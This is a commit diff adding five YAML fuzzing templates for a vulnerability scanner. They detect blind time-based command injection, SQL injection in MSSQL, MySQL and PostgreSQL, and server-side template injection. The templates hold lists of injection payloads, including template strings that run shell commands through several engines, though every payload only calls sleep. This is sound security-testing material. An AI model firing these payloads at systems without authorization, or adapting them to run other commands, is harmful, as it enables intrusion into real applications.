Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
feat: added blind time based fuzzing templates using analyzer
- Loading branch information
1 parent
8326a59
commit 6093d85
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,60 @@ | ||
| id: command-injection-blind-time-based | ||
|
|
||
| info: | ||
| name: Command Injection - Blind Time based | ||
| author: pdteam | ||
| severity: critical | ||
| reference: | ||
| - https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/CommandInjectionScanRule.java | ||
|
|
||
| http: | ||
| - payloads: | ||
| injections: | ||
| low: | ||
| - "&sleep [SLEEPTIME]&" | ||
| - ";sleep [SLEEPTIME];" | ||
| - "&timeout /T [SLEEPTIME]" | ||
| - "$(sleep [SLEEPTIME])" | ||
| - "`sleep [SLEEPTIME]`" | ||
| medium: | ||
| - "|timeout /T [SLEEPTIME]" | ||
| - ";start-sleep -s [SLEEPTIME]" | ||
| - "\"&sleep [SLEEPTIME]&\"" | ||
| - "\";sleep [SLEEPTIME];\"" | ||
| - "\"&timeout /T [SLEEPTIME]&\"" | ||
| - "\";start-sleep -s [SLEEPTIME]" | ||
| - "'&sleep [SLEEPTIME]&'" | ||
| - "';sleep [SLEEPTIME];'" | ||
| high: | ||
| - "'&timeout /T [SLEEPTIME]&'" | ||
| - "'|timeout /T [SLEEPTIME]" | ||
| - "';start-sleep -s [SLEEPTIME]" | ||
| - "\nsleep [SLEEPTIME]\n" | ||
| - "`sleep [SLEEPTIME]`" | ||
| - "||sleep [SLEEPTIME]" | ||
| - "&&sleep [SLEEPTIME]" | ||
| - "\"|timeout /T [SLEEPTIME]" | ||
| - "|sleep [SLEEPTIME]#" | ||
| - "run timeout /T [SLEEPTIME]" | ||
| - ";start-sleep -s [SLEEPTIME] #" | ||
| - "&[SLEEPTIME]&" | ||
| - ";[SLEEPTIME];" | ||
|
|
||
| attack: pitchfork | ||
| analyzer: | ||
| name: time_delay | ||
|
|
||
| fuzzing: | ||
| - part: request | ||
| type: postfix | ||
| mode: single | ||
| fuzz: | ||
| - "{{injections}}" | ||
|
|
||
| stop-at-first-match: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: analyzer | ||
| words: | ||
| - "true" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,49 @@ | ||
| id: mssql-blind-time-based-sqli | ||
|
|
||
| info: | ||
| name: MSSQL SQLi - Blind Time based | ||
| author: pdteam | ||
| severity: critical | ||
| reference: | ||
| - https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SqlInjectionMsSqlScanRule.java | ||
|
|
||
| http: | ||
| - payloads: | ||
| injections: | ||
| low: | ||
| - " WAITFOR DELAY '0:0:[SLEEPTIME]' --" | ||
| - "' WAITFOR DELAY '0:0:[SLEEPTIME]' --" | ||
| - "\" WAITFOR DELAY '0:0:[SLEEPTIME]' --" | ||
| medium: | ||
| - ") WAITFOR DELAY '0:0:[SLEEPTIME]' --" | ||
| - ") ' WAITFOR DELAY '0:0:[SLEEPTIME]' --" | ||
| - ") \" WAITFOR DELAY '0:0:[SLEEPTIME]' --" | ||
| - ")) WAITFOR DELAY '0:0:[SLEEPTIME]' --" | ||
| - ")) ' WAITFOR DELAY '0:0:[SLEEPTIME]' --" | ||
| - ")) \" WAITFOR DELAY '0:0:[SLEEPTIME]' --" | ||
| high: | ||
| - ") WAITFOR DELAY '0:0:[SLEEPTIME]' (" | ||
| - ") ' WAITFOR DELAY '0:0:[SLEEPTIME]' (" | ||
| - ") \" WAITFOR DELAY '0:0:[SLEEPTIME]' (" | ||
| - ")) WAITFOR DELAY '0:0:[SLEEPTIME]' ((" | ||
| - ")) ' WAITFOR DELAY '0:0:[SLEEPTIME]' ((" | ||
| - ")) \" WAITFOR DELAY '0:0:[SLEEPTIME]' ((" | ||
|
|
||
| attack: pitchfork | ||
| analyzer: | ||
| name: time_delay | ||
|
|
||
| fuzzing: | ||
| - part: request | ||
| type: postfix | ||
| mode: single | ||
| fuzz: | ||
| - "{{injections}}" | ||
|
|
||
| stop-at-first-match: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: analyzer | ||
| words: | ||
| - "true" | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,56 @@ | ||
| id: mysql-blind-time-based-sqli | ||
|
|
||
| info: | ||
| name: MySQL SQLi - Blind Time based | ||
| author: pdteam | ||
| severity: critical | ||
| reference: | ||
| - https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SqlInjectionMySqlScanRule.java | ||
|
|
||
| http: | ||
| # payloads taken from zap | ||
| - payloads: | ||
| injections: | ||
| low: | ||
| - " / sleep([SLEEPTIME]) " | ||
| - "' / sleep([SLEEPTIME]) / '" | ||
| - "\" / sleep([SLEEPTIME]) / \"" | ||
| - " and 0 in (select sleep([SLEEPTIME]) ) -- " | ||
| - "' and 0 in (select sleep([SLEEPTIME]) ) -- " | ||
| - "\" and 0 in (select sleep([SLEEPTIME]) ) -- " | ||
| medium: | ||
| - " where 0 in (select sleep([SLEEPTIME]) ) -- " | ||
| - "' where 0 in (select sleep([SLEEPTIME]) ) -- " | ||
| - "\" where 0 in (select sleep([SLEEPTIME]) ) -- " | ||
| - " or 0 in (select sleep([SLEEPTIME]) ) -- " | ||
| - "' or 0 in (select sleep([SLEEPTIME]) ) -- " | ||
| - "\" or 0 in (select sleep([SLEEPTIME]) ) -- " | ||
| - " where 0 in (select sleep([SLEEPTIME]) ) " | ||
| - "' where 0 in (select sleep([SLEEPTIME]) ) and ''='" | ||
| high: | ||
| - "\" where 0 in (select sleep([SLEEPTIME]) ) and \"\"=\"" | ||
| - " and 0 in (select sleep([SLEEPTIME]) ) " | ||
| - "' and 0 in (select sleep([SLEEPTIME]) ) and ''='" | ||
| - "\" and 0 in (select sleep([SLEEPTIME]) ) and \"\"=\"" | ||
| - " or 0 in (select sleep([SLEEPTIME]) ) " | ||
| - "' or 0 in (select sleep([SLEEPTIME]) ) and ''='" | ||
| - "\" or 0 in (select sleep([SLEEPTIME]) ) and \"\"=\"" | ||
|
|
||
| attack: pitchfork | ||
| analyzer: | ||
| name: time_delay | ||
|
|
||
| fuzzing: | ||
| - part: request | ||
| type: postfix | ||
| mode: single | ||
| fuzz: | ||
| - "{{injections}}" | ||
|
|
||
| stop-at-first-match: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: analyzer | ||
| words: | ||
| - "true" | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,52 @@ | ||
| id: postgres-sqli-time-based | ||
|
|
||
| info: | ||
| name: PostgreSQL Time based SQL Injection | ||
| author: pdteam | ||
| severity: critical | ||
| reference: | ||
| - https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SqlInjectionPostgreScanRule.java | ||
|
|
||
|
|
||
| http: | ||
| - payloads: | ||
| injections: | ||
| low: | ||
| - "case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end" | ||
| - "case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end --" | ||
| - "' case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end --" | ||
| - "\" case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end --" | ||
| medium: | ||
| - " / case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end " | ||
| - "' / case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end / '" | ||
| - "\" / case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end / \"" | ||
| - " where 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" | ||
| - "' where 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" | ||
| - "\" where 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" | ||
| high: | ||
| - " and 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" | ||
| - "' and 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" | ||
| - "\" and 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" | ||
| - " or 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" | ||
| - "' or 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" | ||
| - "\" or 0 in (select case when cast(pg_sleep([SLEEPTIME]) as varchar) > '' then 0 else 1 end ) --" | ||
|
|
||
| attack: pitchfork | ||
|
|
||
| analyzer: | ||
| name: time_delay | ||
|
|
||
| fuzzing: | ||
| - part: request | ||
| type: postfix | ||
| mode: single | ||
| fuzz: | ||
| - "{{injections}}" | ||
|
|
||
| stop-at-first-match: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: analyzer | ||
| words: | ||
| - "true" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,46 @@ | ||
| id: ssti-blind-time-based | ||
|
|
||
| info: | ||
| name: Server Side Template Injection - Blind Time based | ||
| author: pdteam | ||
| severity: critical | ||
| reference: | ||
| - https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SstiBlindScanRule.java | ||
|
|
||
| http: | ||
| - payloads: | ||
| injections: | ||
| low: | ||
| - "<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"sleep [SLEEPTIME]\") }" # javaFreemarker | ||
| - "#set($engine=\"\")\n#set($proc=$engine.getClass().forName(\"java.lang.Runtime\").getRuntime().exec(\"sleep [SLEEPTIME]\"))\n#set($null=$proc.waitFor())\n${null}" # javaVelocity | ||
| - "{{= global.process.mainModule.require('child_process').execSync('sleep [SLEEPTIME]').toString() }}" # Javascript dot | ||
| - "<%= global.process.mainModule.require('child_process').execSync('sleep [SLEEPTIME]').toString()%>" # Javascript EJS | ||
| - "#{global.process.mainModule.require('child_process').execSync('sleep [SLEEPTIME]').toString()}" # Javascript jade | ||
| - "{{range.constructor(\"return eval(\\\"global.process.mainModule.require('child_process').execSync('sleep [SLEEPTIME]').toString()\\\")\")()}}" # Javascript Nunjucks | ||
| - "{system(\"sleep [SLEEPTIME]\")}" # PHP smarty | ||
| - "{{\"\".__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get(\"__builtins__\").get(\"__import__\")(\"subprocess\").check_output(\"sleep [SLEEPTIME]\")}}" # python3 jinja2 | ||
| - "${__import__(\"subprocess\").check_output(\"sleep [SLEEPTIME]\", shell=True)}" # python Mako | ||
| - "{{__import__(\"subprocess\").check_output(\"sleep [SLEEPTIME]\", shell=True)}}" # Python | ||
| - "<%=%x(sleep [SLEEPTIME])%>" # Ruby ERB | ||
| - "#{%x(sleep [SLEEPTIME])}" # Ruby Slims | ||
| - "{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('sleep [SLEEPTIME]')}}" | ||
|
|
||
| skip-variables-check: true | ||
| attack: pitchfork | ||
| analyzer: | ||
| name: time_delay | ||
|
|
||
| fuzzing: | ||
| - part: request | ||
| type: postfix | ||
| mode: single | ||
| fuzz: | ||
| - "{{injections}}" | ||
|
|
||
| stop-at-first-match: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: analyzer | ||
| words: | ||
| - "true" | ||